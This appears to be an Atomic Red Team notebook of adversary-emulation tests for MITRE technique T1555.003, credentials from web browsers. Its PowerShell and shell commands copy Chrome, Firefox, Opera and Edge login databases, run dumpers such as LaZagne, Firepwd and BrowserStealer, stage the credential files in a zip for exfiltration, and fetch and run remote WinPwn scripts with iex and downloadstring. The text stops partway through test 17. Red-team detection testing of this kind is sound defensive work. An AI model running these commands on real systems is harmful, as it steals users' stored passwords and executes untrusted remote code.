# T1555.003 - Credentials from Web Browsers
Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.

For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, <code>AppData\Local\Google\Chrome\User Data\Default\Login Data</code> and executing a SQL query: <code>SELECT action_url, username_value, password_value FROM logins;</code>. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function <code>CryptUnprotectData</code>, which uses the victim’s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018)
 
Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).

Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)

After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).

## Atomic Tests

### Atomic Test #1 - Run Chrome-password Collector
A modified sysinternals suite will be downloaded and staged. The Chrome-password collector, renamed accesschk.exe, will then be executed from #{file_path}.

Successful execution will produce stdout message stating "Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly". Upon completion, final output will be a file modification of PathToAtomicsFolder\..\ExternalPayloads\sysinternals\passwordsdb.

Adapted from [MITRE ATTACK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml)

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Modified Sysinternals must be located at #{file_path}

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SysInternals") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Modified-SysInternalsSuite.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Modified-SysInternalsSuite.zip" "PathToAtomicsFolder\..\ExternalPayloads\sysinternals" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\Modified-SysInternalsSuite.zip" -Force

```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Set-Location -path "PathToAtomicsFolder\..\ExternalPayloads\Sysinternals";
./accesschk.exe -accepteula .;
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 1

#### Cleanup: 
```powershell
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\Sysinternals" -Force -Recurse -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Search macOS Safari CookiesThis test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware.

Upon successful execution, MacOS shell will cd to `~/Libraries/Cookies` and grep for `Cookies.binarycookies`.
**Supported Platforms:** macos#### Attack Commands: Run with `sh`
```sh
cd ~/Library/Cookies
grep -q "coinbase" "Cookies.binarycookies"
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 2

### Atomic Test #3 - LaZagne - Credentials from Browser
The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne) to extract passwords from browsers on the Windows operating system.
LaZagne is an open source application used to retrieve passwords stored on a local computer. 

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: LaZagne.exe must exist on disk at specified location (#{lazagne_path})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1555.003\bin\LaZagne.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1555.003\bin\LaZagne.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe" -OutFile "PathToAtomicsFolder\T1555.003\bin\LaZagne.exe"

```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
"PathToAtomicsFolder\T1555.003\bin\LaZagne.exe" browsers
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 3

### Atomic Test #4 - Simulating access to Chrome Login Data
Simulates an adversary accessing encrypted credentials from Google Chrome Login database. 

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Chrome must be installed

##### Check Prereq Commands:
```powershell
if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
$installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi"
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
msiexec /i $installer /qn
Start-Process -FilePath "chrome.exe"
Stop-Process -Name "chrome"

```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -Destination "PathToAtomicsFolder\..\ExternalPayloads"
Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data For Account" -Destination "PathToAtomicsFolder\..\ExternalPayloads"
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 4

#### Cleanup: 
```powershell
Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Login Data" -Force -ErrorAction Ignore
Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Login Data For Account" -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 4 -Cleanup

### Atomic Test #5 - Simulating access to Opera Login Data
Simulates an adversary accessing encrypted credentials from Opera web browser's login database. 

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Opera must be installed

##### Check Prereq Commands:
```powershell
if (((Test-Path "$env:LOCALAPPDATA\Programs\Opera\launcher.exe") -Or (Test-Path "C:\Program Files\Opera\launcher.exe") -Or (Test-Path "C:\Program Files (x86)\Opera\launcher.exe"))) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
$installer = "PathToAtomicsFolder\..\ExternalPayloads\OperaStandaloneInstaller.exe"
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\OperaStandaloneInstaller.exe" https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe
Start-Process $installer -ArgumentList '/install /silent /launchopera=1 /setdefaultbrowser=0'
Start-Sleep -s 180
Stop-Process -Name "opera"

```
##### Description: Opera login data file must exist

##### Check Prereq Commands:
```powershell
if (Test-Path "$env:APPDATA\Opera Software\Opera Stable\Login Data") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Path "$env:APPDATA\Opera Software\Opera Stable\Login Data" -ItemType File

```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data" -Destination "PathToAtomicsFolder\..\ExternalPayloads"
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 5

#### Cleanup: 
```powershell
Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Login Data" -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 5 -Cleanup

### Atomic Test #6 - Simulating access to Windows Firefox Login Data
Simulates an adversary accessing encrypted credentials from firefox web browser's login database.
more info in https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-user-data

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Firefox must be installed

##### Check Prereq Commands:
```powershell
if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-US"}else {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win&lang=en-US"}
$installer = "PathToAtomicsFolder\..\ExternalPayloads\firefoxsetup.exe"
(New-Object Net.WebClient).DownloadFile($url,$installer)
Start-Process $installer -ArgumentList '/S' -Wait

```
##### Description: Firefox login data file must exist

##### Check Prereq Commands:
```powershell
if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$firefox="C:\Program Files\Mozilla Firefox\firefox.exe"}else {$firefox="C:\Program Files (x86)\Mozilla Firefox\firefox.exe"}
Start-Process $firefox -ArgumentList '-CreateProfile Atomic' -Wait
Start-Process $firefox -NoNewWindow
Start-Sleep -s 20
Stop-Process -Name firefox

```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 6 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination "PathToAtomicsFolder\..\ExternalPayloads" -Force -Recurse
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 6

#### Cleanup: 
```powershell
Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Profiles" -Force -ErrorAction Ignore -Recurse
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 6 -Cleanup

### Atomic Test #7 - Simulating access to Windows Edge Login Data
Simulates an adversary accessing encrypted credentials from Edge web browser's login database.
more info in https://www.forensicfocus.com/articles/chromium-based-microsoft-edge-from-a-forensic-point-of-view/

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Edge must be installed

##### Check Prereq Commands:
```powershell
if (Test-Path "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
"Installation is not implemented as Edge is a part of windows"

```
##### Description: Edge login data file must exist

##### Check Prereq Commands:
```powershell
if (Test-Path "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
$edge="C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Start-Process $edge 
Start-Sleep -s 20
Stop-Process -Name msedge

```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 7 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default" -Destination "PathToAtomicsFolder\..\ExternalPayloads\Edge" -Force -Recurse
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 7

#### Cleanup: 
```powershell
Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Edge" -Force -ErrorAction Ignore -Recurse
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 7 -Cleanup

### Atomic Test #8 - Decrypt Mozilla Passwords with Firepwd.py
Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords.
Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen. 

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Firepwd must exist at #{Firepwd_Path}

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py"

```
##### Description: Firefox profile directory must be present

##### Check Prereq Commands:
```powershell
if (get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" -erroraction silentlycontinue) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://ftp.mozilla.org/pub/firefox/releases/98.0/win64/en-US/Firefox%20Setup%2098.0.msi" -outfile "PathToAtomicsFolder\..\ExternalPayloads\firefox.msi"
msiexec.exe /i "PathToAtomicsFolder\..\ExternalPayloads\firefox.msi" /quiet
sleep -s 30
start-process "$env:programfiles\Mozilla Firefox\firefox.exe".
sleep -s 5
stop-process -name "firefox"

```
##### Description: Visual Studio Build Tools command prompt must exist at #{VS_CMD_Path}

##### Check Prereq Commands:
```powershell
if (Test-Path "C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\VC\Auxiliary\Build\vcvars64.bat") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://aka.ms/vs/17/release/vs_BuildTools.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\VS_BuildTools.exe"
write-host "Visual Studio Build Tools (Desktop Development with C++) must be installed manually. Please run the installer from PathToAtomicsFolder\..\ExternalPayloads\VS_BuildTools.exe."

```
##### Description: Python must be installed

##### Check Prereq Commands:
```powershell
if (Test-Path "C:\Program Files\Python310\python.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait

```
##### Description: Pip must be installed.

##### Check Prereq Commands:
```powershell
$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
if (pip -v) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"

```
##### Description: Pycryptodome library must be installed 

##### Check Prereq Commands:
```powershell
$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
if (pip show pycryptodome) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
if (test-path "C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\VC\Auxiliary\Build\vcvars64.bat"){pip install pycryptodome | out-null | cmd /c %comspec% /k "C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\VC\Auxiliary\Build\vcvars64.bat" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}

```
##### Description: Pyasn1 library must be installed 

##### Check Prereq Commands:
```powershell
$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
if (pip show pyasn1) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
if (test-path "C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\VC\Auxiliary\Build\vcvars64.bat"){pip install pyasn1 | out-null | cmd /c %comspec% /k "C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\VC\Auxiliary\Build\vcvars64.bat" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}

```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 8 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
cmd /c PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py -d $PasswordDBLocation > $env:temp\T1555.003Test8.txt
cat $env:temp\T1555.003Test8.txt
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 8

#### Cleanup: 
```powershell
Remove-Item -Path "$env:temp\T1555.003Test8.txt" -erroraction silentlycontinue   
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 8 -Cleanup

### Atomic Test #9 - LaZagne.py - Dump Credentials from Firefox Browser
Credential Dump Ubuntu 20.04.4 LTS Focal Fossa Firefox Browser, Reference https://github.com/AlessandroZ/LaZagne
**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: Get Lazagne from Github and install requirements
##### Check Prereq Commands:
```sh
test -f /tmp/LaZagne/Linux/laZagne.py
```
##### Get Prereq Commands:
```sh
cd /tmp; git clone https://github.com/AlessandroZ/LaZagne; cd /tmp/LaZagne/; pip install -r requirements.txt
```
##### Description: Needs git, python3 and some pip stuff
##### Check Prereq Commands:
```sh
which git && which python3 && which pip
```
##### Get Prereq Commands:
```sh
apt install git; apt install python3-pip -y; pip install pyasn1 psutil Crypto
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 9 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
python3 /tmp/LaZagne/Linux/laZagne.py browsers -firefox >> /tmp/firefox_password.txt```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 9

#### Cleanup: 
```sh
rm -R /tmp/LaZagne; rm -f /tmp/firefox_password.txt```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 9 -Cleanup

### Atomic Test #10 - Stage Popular Credential Files for ExfiltrationThis test is designed to search a drive for credential files used by the most common web browsers on Windows (Firefox, Chrome, Opera, and Edge), export the found files to a folder, and zip it,
simulating how an adversary might stage sensitive credential files for exfiltration in order to conduct offline password extraction with tools like [firepwd.py](https://github.com/lclevy/firepwd) or [HackBrowserData](https://github.com/moonD4rk/HackBrowserData). 
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$exfil_folder = "$env:temp\T1555.003"
if (test-path "$exfil_folder") {} else {new-item -path "$env:temp" -Name "T1555.003" -ItemType "directory" -force}
$FirefoxCredsLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
if (test-path "$FirefoxCredsLocation\key4.db") {copy-item "$FirefoxCredsLocation\key4.db" -destination "$exfil_folder\T1555.003Firefox_key4.db"} else {}
if (test-path "$FirefoxCredsLocation\logins.json") {copy-item "$FirefoxCredsLocation\logins.json" -destination "$exfil_folder\T1555.003Firefox_logins.json"} else {}
if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -destination "$exfil_folder\T1555.003Chrome_Login Data"} else {}
if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account" -destination "$exfil_folder\T1555.003Chrome_Login Data For Account"} else {}
if (test-path "$env:appdata\Opera Software\Opera Stable\Login Data") {copy-item "$env:appdata\Opera Software\Opera Stable\Login Data" -destination "$exfil_folder\T1555.003Opera_Login Data"} else {}
if (test-path "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data") {copy-item "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data" -destination "$exfil_folder\T1555.003Edge_Login Data"} else {} 
compress-archive -path "$exfil_folder" -destinationpath "$exfil_folder.zip" -force
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 10

#### Cleanup: 
```powershell
Remove-Item -Path "$env:temp\T1555.003.zip" -force -erroraction silentlycontinue   
Remove-Item -Path "$env:temp\T1555.003\" -force -recurse -erroraction silentlycontinue
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 10 -Cleanup

### Atomic Test #11 - WinPwn - BrowserPwnCollect Browser credentials as well as the history via winpwn browserpwn function of WinPwn.**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
browserpwn -consoleoutput -noninteractive```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 11

#### Cleanup: 
```powershell
rm .\System.Data.SQLite.dll -ErrorAction Ignore```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 11 -Cleanup

### Atomic Test #12 - WinPwn - Loot local Credentials - mimi-kittenzLoot local Credentials - mimi-kittenz technique via function of WinPwn - Extend timeout to 600s**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
kittenz -consoleoutput -noninteractive```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 12

### Atomic Test #13 - WinPwn - PowerSharpPack - Sharpweb for Browser CredentialsPowerSharpPack - Sharpweb searching for Browser Credentials technique via function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Sharpweb.ps1')
Invoke-Sharpweb -command "all"```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 13

### Atomic Test #14 - Simulating Access to Chrome Login Data - MacOSThis test locates the Login Data files used by Chrome to store encrypted credentials, then copies them to the temp directory for later exfil. 
Once the files are exfiltrated, malware like CookieMiner could be used to perform credential extraction. 
See https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ . 
**Supported Platforms:** macos#### Attack Commands: Run with `sh`
```sh
cp ~/Library/"Application Support/Google/Chrome/Default/Login Data" "/tmp/T1555.003_Login Data"
cp ~/Library/"Application Support/Google/Chrome/Default/Login Data For Account" "/tmp/T1555.003_Login Data For Account"
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 14

#### Cleanup: 
```sh
rm "/tmp/T1555.003_Login Data" >/dev/null 2>&1
rm "/tmp/T1555.003_Login Data For Account" >/dev/null 2>&1
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 14 -Cleanup

### Atomic Test #15 - WebBrowserPassView - Credentials from Browser
The following Atomic test utilizes WebBrowserPassView to extract passwords from browsers on a Window system. WebBrowserPassView is an open source application used to retrieve passwords stored on a local computer. Recently noticed as a tool used in the BlackCat Ransomware.
**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Check if WebBrowserPassView.exe exists in the specified path #{webbrowserpassview_path}

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\T1555.003\bin\WebBrowserPassView.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\T1555.003\bin\" -ErrorAction ignore -Force | Out-Null
Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1555.003/bin/WebBrowserPassView.exe -OutFile "PathToAtomicsFolder\T1555.003\bin\WebBrowserPassView.exe"

```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 15 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Start-Process "PathToAtomicsFolder\T1555.003\bin\WebBrowserPassView.exe"
Start-Sleep -Second 4
Stop-Process -Name "WebBrowserPassView"
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 15

### Atomic Test #16 - BrowserStealer (Chrome / Firefox / Microsoft Edge)
[Github Repo](https://github.com/SaulBerrenson/BrowserStealer) Simple password/cookies stealer for chrome, edge, and gecko based browsers (30 listed working). This attack simulates stealing the data from the browser files and printing them to the command line.
If using to test with Firefox, if the browser is x64 you need to use the x64 build

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Google Chrome must be on the device.

##### Check Prereq Commands:
```powershell
if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
$installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi"
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
msiexec /i $installer /qn
Start-Process -FilePath "chrome.exe"
Stop-Process -Name "chrome"

```
##### Description: BrowserCollector must exist in the bin directory

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\T1555.003\bin\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/SaulBerrenson/BrowserStealer/releases/download/1.0.0.4/BrowserCollector_x64.exe" -Outfile: "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe"
```
##### Description: Login Data file that is a copy of a chrome Login Data that contains credentials for the tool to "steal." Must exist at the specified path.

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\T1555.003\src\Login Data") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T155.003/src/LoginData?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\Login Data"
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 16 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Copy-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -Destination "PathToAtomicsFolder\..\ExternalPayloads" > $null
Remove-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null
Copy-Item "$env:PathToAtomicsFolder\T1555.003\src\Login Data" -Destination "$env:localappdata\Google\Chrome\User Data\Default\" > $null
cd "$env:PathToAtomicsFolder\T1555.003\bin"
.\BrowserCollector.exe
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 16

#### Cleanup: 
```powershell
Remove-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads" -Destination "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\Login Data" > $null
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 16 -Cleanup

### Atomic Test #17 - Dump Chrome Login Data with esentutl
This test simulates an adversary using esentutl to dump encrypted credentials from Google Chrome's Login database.
[Reference](https://actzero.ai/resources/blog/hygiene-tip-shut-down-attackers-harvesting-cached-browser-credentials/)

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Chrome must be installed

##### Check Prereq Commands:
```cmd
